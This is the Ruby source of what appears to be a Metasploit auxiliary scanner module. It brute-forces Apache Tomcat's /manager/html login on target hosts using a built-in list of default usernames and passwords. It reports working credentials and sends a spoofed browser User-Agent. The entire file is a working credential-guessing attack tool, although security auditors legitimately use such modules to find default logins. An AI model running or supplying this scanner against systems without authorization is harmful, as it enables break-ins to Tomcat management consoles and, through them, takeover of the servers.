## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WMAPScanServer include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Tomcat Application Manager default access', 'Version' => '$Revision$', 'Description' => 'Detect Tomcat Web Application Manager default access.', 'References' => [ ['URL', 'http://tomcat.apache.org/'], ], 'Author' => 'Matteo Cantoni ', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(8180), OptString.new('TOMCAT_USER', [ false, 'The username to authenticate as', '']), OptString.new('TOMCAT_PASS', [ false, 'The password for the specified username', '']), OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]), ], self.class) end def run_host(ip) begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/', }, 25) if (res and res.code == 200) user = datastore['TOMCAT_USER'].to_s pass = datastore['TOMCAT_PASS'].to_s if user.length == 0 default_usernames = ['admin','manager','role1','root','tomcat'] else default_usernames = [user] end if pass.length == 0 default_passwords = ['admin','manager','role1','root','tomcat'] else default_passwords = [pass] end default_usernames.each do |username| default_passwords.each do |password| user_pass = Rex::Text.encode_base64("#{username}" + ":" + "#{password}") begin res = send_request_cgi({ 'uri' => "/manager/html", 'method' => 'GET', 'headers' => { 'Authorization' => "Basic #{user_pass}", } }, 25) if (res.code == 200) print_status("http://#{target_host}:#{rport}/manager/html [#{res.headers['Server']}] [Tomcat Application Manager] [#{username}/#{password}]") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end end